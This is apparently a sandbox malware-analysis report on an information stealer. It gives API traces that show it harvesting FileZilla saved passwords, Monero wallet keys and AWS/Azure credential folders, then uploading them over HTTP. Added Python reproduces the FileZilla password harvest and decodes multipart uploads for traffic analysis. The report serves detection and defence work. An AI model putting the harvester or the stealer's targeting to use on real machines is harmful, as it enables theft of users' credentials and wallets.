                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 1f92babc46ea2cc2df151f730db13f61feb7d3575e5ef7de5d5ed1fee7257ec2
                                    • Instruction ID: 5f0b5ad9326aa7d58d4aa8fdfd8349b46babe60b3a0075f739c980fee2da695d
                                    • Opcode Fuzzy Hash: 1f92babc46ea2cc2df151f730db13f61feb7d3575e5ef7de5d5ed1fee7257ec2
                                    • Instruction Fuzzy Hash: 91D10B72910148ABCB04EBF5DD96EEE77BDAF19300F408594F106B70A1EB74BA49CB61
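The function above is the FileZilla harvest: it locates \AppData\Roaming\FileZilla\recentservers.xml, scans it with StrStrA for <Host>, <Port>, <User> and <Pass encoding="base64"> (FileZilla stores saved passwords in that file only base64-encoded), and lstrcat's the pieces into a record under the labels "browser: FileZilla", "profile: null", "url: ", "login: " and "password: ". The Python below is an added example written for this page, not code from the sample or from Joe Sandbox. It reproduces the substring-based parse on a constructed recentservers.xml, decodes the password, emits the record in the same label order, and adds a local audit function a defender can run. Assumptions: the separator strings between the concatenated pieces (the unresolved addresses 00BF1770, 00BF1774, 00BF1780, 00BF1790 and 00BF1794) are taken to be ":" and newlines, and the audit path is %APPDATA%\FileZilla\recentservers.xml.

```python
"""Reproduce the FileZilla recentservers.xml harvest from the API trace.

Added example, not the sample's code. The XML below is constructed in
FileZilla 3's real layout; the separators in format_record() are assumed.
"""
import base64
import os

# Constructed input: two saved servers, one with a stored password, one using
# a key file (Logontype 5), which is why it has no <Pass> element.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.0" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.internal.test</Host>
      <Port>2222</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>backup</User>
      <Logontype>5</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""

OPEN_PASS = '<Pass encoding="base64">'  # exact string searched for in the trace


def _between(text, open_tag, close_tag):
    """Substring scan in the style of the StrStrA/lstrlen calls in the trace:
    the value between open_tag and the next close_tag, or None if absent."""
    i = text.find(open_tag)
    if i < 0:
        return None
    i += len(open_tag)
    j = text.find(close_tag, i)
    return None if j < 0 else text[i:j]


def harvest_filezilla(xml_text):
    """One dict per <Server> block. 'password' is the decoded
    <Pass encoding="base64"> value, or None when the entry has none."""
    records = []
    pos = 0
    while True:
        start = xml_text.find("<Server>", pos)
        if start < 0:
            break
        end = xml_text.find("</Server>", start)
        if end < 0:
            break
        pos = end + len("</Server>")
        block = xml_text[start:end]
        host = _between(block, "<Host>", "</Host>")
        if host is None:
            continue
        password = None
        encoded = _between(block, OPEN_PASS, "</Pass>")
        if encoded is not None:
            try:
                password = base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError: malformed base64
                password = None
        records.append({
            "host": host,
            "port": _between(block, "<Port>", "</Port>") or "",
            "user": _between(block, "<User>", "</User>") or "",
            "password": password,
        })
    return records


def format_record(rec):
    """Stealer-style record. The five labels are on the page; the ':' between
    host and port and the newline separators are an assumption (addresses
    00BF1770..00BF1794 are not resolved in the report)."""
    pw = rec["password"] if rec["password"] is not None else ""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host']}:{rec['port']}\n"
        f"login: {rec['user']}\n"
        f"password: {pw}\n"
    )


def audit_local_filezilla(path=None):
    """Defender check: entries on this host whose password is recoverable.
    Path is an assumption (%APPDATA%\\FileZilla\\recentservers.xml)."""
    if path is None:
        path = os.path.join(os.environ.get("APPDATA", ""), "FileZilla", "recentservers.xml")
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [r for r in harvest_filezilla(fh.read()) if r["password"] is not None]


if __name__ == "__main__":
    for rec in harvest_filezilla(SAMPLE_RECENTSERVERS):
        print(format_record(rec))
```

Running the script prints the two records; only the first carries a password, which is the point for defenders: any FileZilla "Normal" logon with a saved password is plaintext-equivalent to whatever reads the user's profile, so prefer key-file or master-password protected logons and treat a recentservers.xml read by an unexpected process as an exfiltration indicator.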
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BD4889
                                      • Part of subcall function 00BD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BD4899
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BD5A48
                                    • StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD5A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD5BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,018BE758,00000000,?,018BA6B8,00000000,?,00BF1B4C), ref: 00BD5EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00BD5ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD5EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD5EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00BD5EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00BD5F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BD5F41
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00BD5F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BD5F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BD5F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD6000
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD600D
                                    • HttpOpenRequestA.WININET(00000000,018BE708,?,018BE208,00000000,00000000,00400100,00000000), ref: 00BD5C48
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD6017
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 4aa3005c33c67d748889b79e539c9b1f4712ca179ac13fd4b82d34776d634b97
                                    • Instruction ID: 9a7a152934f54a651c90407d657a16d1f868ae4a700d81ffc348fd6771dc20ea
                                    • Opcode Fuzzy Hash: 4aa3005c33c67d748889b79e539c9b1f4712ca179ac13fd4b82d34776d634b97
                                    • Instruction Fuzzy Hash: F4120C72D20158ABCB15EBA1DDA5FEEB3BDBF24700F1145D9B106621A1EF307A48CB61
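The function above is the WinINet upload path: InternetOpenA, InternetConnectA with service type 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), a body assembled with lstrlen/lstrcat around the strings '"' and '------', then HttpSendRequestA and an InternetReadFile of the reply. A quote character and a run of dashes built into a request body are what a hand-rolled multipart/form-data encoder needs: the quoted name attribute of each Content-Disposition line and a boundary that begins with dashes. The Python below is an added example, not code from the sample or from Joe Sandbox: it builds such a body the way an lstrcat-based client does and parses a captured one back into fields with the standard library, so an analyst can decode a PCAP of this traffic. Only the '------' prefix and the quote are on the page; the boundary digits, field names and values are constructed for the example, and the dash-run check at the end is a weak indicator, not a signature.

```python
"""Both ends of a lstrcat-built multipart/form-data upload.

Added example, not the sample's code. Boundary digits, field names and
values are constructed; only the '------' prefix and '"' are in the trace.
"""
import email
import email.policy

BOUNDARY_PREFIX = "------"  # dash run seen as a string in the trace

# Constructed fields standing in for whatever the sample uploads.
SAMPLE_FIELDS = {"hwid": "ABCD-1234", "payload": b"\x00\xffbinary-blob"}
SAMPLE_BOUNDARY = BOUNDARY_PREFIX + "123456789"


def build_multipart(fields, boundary):
    """Serialise name -> str|bytes as multipart/form-data (RFC 7578 layout),
    appending piece by piece as a lstrcat-based client would.
    Returns (Content-Type header value, body bytes)."""
    out = bytearray()
    for name, value in fields.items():
        data = value if isinstance(value, bytes) else value.encode("utf-8")
        out += f"--{boundary}\r\n".encode()
        # The '"' string in the trace fits this quoted name attribute.
        out += f'Content-Disposition: form-data; name="{name}"\r\n\r\n'.encode()
        out += data + b"\r\n"
    out += f"--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", bytes(out)


def parse_multipart(content_type, body):
    """Parse a captured multipart/form-data body into {name: bytes}.
    The stdlib email parser handles binary parts and strips the CRLF that
    belongs to the boundary rather than to the preceding part."""
    raw = (b"MIME-Version: 1.0\r\nContent-Type: " + content_type.encode()
           + b"\r\n\r\n" + body)
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    if not msg.is_multipart():
        raise ValueError("not a multipart body")
    parts = {}
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        if name is not None:
            parts[name] = part.get_payload(decode=True)
    return parts


def boundary_of(content_type):
    """Boundary parameter of a Content-Type header value, or None."""
    for piece in content_type.split(";")[1:]:
        key, _, val = piece.strip().partition("=")
        if key.lower() == "boundary":
            return val.strip('"')
    return None


def has_dash_run_boundary(content_type):
    """Weak indicator only: boundary starts with the '------' run from the
    trace. Browsers use other prefixes (e.g. '----WebKitFormBoundary'), but
    plenty of legitimate tools pick dash runs too, so combine with other
    features (destination, JA3, body field names) before alerting."""
    b = boundary_of(content_type)
    return b is not None and b.startswith(BOUNDARY_PREFIX)


if __name__ == "__main__":
    ct, body = build_multipart(SAMPLE_FIELDS, SAMPLE_BOUNDARY)
    print(ct)
    print(body.decode("latin-1"))
    print(parse_multipart(ct, body))
    print("dash-run boundary:", has_dash_run_boundary(ct))
```

To decode real traffic, take the Content-Type header and the raw POST body from the capture and pass them to parse_multipart(); the part names then tell you which collected artefacts (the records built by the other functions in this report) the sample shipped in that request.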
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BDD083
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BDD1C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BDD1CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD308
                                    • lstrcat.KERNEL32(?,00BF1570), ref: 00BDD317
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD32A
                                    • lstrcat.KERNEL32(?,00BF1574), ref: 00BDD339
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD34C
                                    • lstrcat.KERNEL32(?,00BF1578), ref: 00BDD35B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD36E
                                    • lstrcat.KERNEL32(?,00BF157C), ref: 00BDD37D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD390
                                    • lstrcat.KERNEL32(?,00BF1580), ref: 00BDD39F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD3B2
                                    • lstrcat.KERNEL32(?,00BF1584), ref: 00BDD3C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BDD3D4
                                    • lstrcat.KERNEL32(?,00BF1588), ref: 00BDD3E3
                                      • Part of subcall function 00BEAB30: lstrlen.KERNEL32(00BD4F55,?,?,00BD4F55,00BF0DDF), ref: 00BEAB3B
                                      • Part of subcall function 00BEAB30: lstrcpy.KERNEL32(00BF0DDF,00000000), ref: 00BEAB95
                                    • lstrlen.KERNEL32(?), ref: 00BDD42A
                                    • lstrlen.KERNEL32(?), ref: 00BDD439
                                      • Part of subcall function 00BEAD80: StrCmpCA.SHLWAPI(00000000,00BF1568,00BDD2A2,00BF1568,00000000), ref: 00BEAD9F
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BDD4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 3b68f8e71e035e1f40181c23623fb335429c987803a0ef25c491415d164e4944
                                    • Instruction ID: 971d21b032de7e8d53f039d2ade16e0ac39bb2d1ab91ac638ad9384afcc56298
                                    • Opcode Fuzzy Hash: 3b68f8e71e035e1f40181c23623fb335429c987803a0ef25c491415d164e4944
                                    • Instruction Fuzzy Hash: 4FE12E72910148AFCB04EBA5DD96EEE77BDAF68301F1145D8F106761A1DF31BA08CB62
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,018BD228,00000000,?,00BF1544,00000000,?,?), ref: 00BDCB6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BDCB89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00BDCB95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BDCBA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BDCBD9
                                    • StrStrA.SHLWAPI(?,018BD240,00BF0B56), ref: 00BDCBF7
                                    • StrStrA.SHLWAPI(00000000,018BD270), ref: 00BDCC1E
                                    • StrStrA.SHLWAPI(?,018BDA50,00000000,?,00BF1550,00000000,?,00000000,00000000,?,018B8E70,00000000,?,00BF154C,00000000,?), ref: 00BDCDA2
                                    • StrStrA.SHLWAPI(00000000,018BDAB0), ref: 00BDCDB9
                                      • Part of subcall function 00BDC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BDC971
                                      • Part of subcall function 00BDC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BDC97C
                                    • StrStrA.SHLWAPI(?,018BDAB0,00000000,?,00BF1554,00000000,?,00000000,018B8EA0), ref: 00BDCE5A
                                    • StrStrA.SHLWAPI(00000000,018B9040), ref: 00BDCE71
                                      • Part of subcall function 00BDC920: lstrcat.KERNEL32(?,00BF0B47), ref: 00BDCA43
                                      • Part of subcall function 00BDC920: lstrcat.KERNEL32(?,00BF0B4B), ref: 00BDCA57
                                      • Part of subcall function 00BDC920: lstrcat.KERNEL32(?,00BF0B4E), ref: 00BDCA78
                                    • lstrlen.KERNEL32(00000000), ref: 00BDCF44
                                    • CloseHandle.KERNEL32(00000000), ref: 00BDCF9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 2cbc2f5f498f87d93fe9bc87094ef9d257e74a16f7f31ff157e73d881515f24c
                                    • Instruction ID: 5d82ab495df2402d180f62da1e196f083a147fc5fa73e8cb4e57aba5b13bca40
                                    • Opcode Fuzzy Hash: 2cbc2f5f498f87d93fe9bc87094ef9d257e74a16f7f31ff157e73d881515f24c
                                    • Instruction Fuzzy Hash: B0E1D871D10148ABCB14EBA5DDA2FEEB7BDAF68300F014599F10667191EF307A49CB61
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • RegOpenKeyExA.ADVAPI32(00000000,018BAE78,00000000,00020019,00000000,00BF05BE), ref: 00BE8534
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BE85B6
                                    • wsprintfA.USER32 ref: 00BE85E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BE860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE8629
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 460cc431b10fb0af7cbf074c62aab7bb9d31391b5af0cc05daf1bc053275b84b
                                    • Instruction ID: 586ccf3f97380adbb923c8841f58d6b0de9db7d8286865aec8cd7746bac02ffd
                                    • Opcode Fuzzy Hash: 460cc431b10fb0af7cbf074c62aab7bb9d31391b5af0cc05daf1bc053275b84b
                                    • Instruction Fuzzy Hash: 5F81E771911158AFDB24DB65CD95FEAB7B8FF58700F1082D8A10AA6190DF707B88CFA0
                                    APIs
                                      • Part of subcall function 00BE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BE8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE5000
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00BE501D
                                      • Part of subcall function 00BE4B60: wsprintfA.USER32 ref: 00BE4B7C
                                      • Part of subcall function 00BE4B60: FindFirstFileA.KERNEL32(?,?), ref: 00BE4B93
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE508C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00BE50A9
                                      • Part of subcall function 00BE4B60: StrCmpCA.SHLWAPI(?,00BF0FC4), ref: 00BE4BC1
                                      • Part of subcall function 00BE4B60: StrCmpCA.SHLWAPI(?,00BF0FC8), ref: 00BE4BD7
                                      • Part of subcall function 00BE4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00BE4DCD
                                      • Part of subcall function 00BE4B60: FindClose.KERNEL32(000000FF), ref: 00BE4DE2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE5118
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BE5135
                                      • Part of subcall function 00BE4B60: wsprintfA.USER32 ref: 00BE4C00
                                      • Part of subcall function 00BE4B60: StrCmpCA.SHLWAPI(?,00BF08D3), ref: 00BE4C15
                                      • Part of subcall function 00BE4B60: wsprintfA.USER32 ref: 00BE4C32
                                      • Part of subcall function 00BE4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00BE4C6E
                                      • Part of subcall function 00BE4B60: lstrcat.KERNEL32(?,018BE598), ref: 00BE4C9A
                                      • Part of subcall function 00BE4B60: lstrcat.KERNEL32(?,00BF0FE0), ref: 00BE4CAC
                                      • Part of subcall function 00BE4B60: lstrcat.KERNEL32(?,?), ref: 00BE4CC0
                                      • Part of subcall function 00BE4B60: lstrcat.KERNEL32(?,00BF0FE4), ref: 00BE4CD2
                                      • Part of subcall function 00BE4B60: lstrcat.KERNEL32(?,?), ref: 00BE4CE6
                                      • Part of subcall function 00BE4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00BE4CFC
                                      • Part of subcall function 00BE4B60: DeleteFileA.KERNEL32(?), ref: 00BE4D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
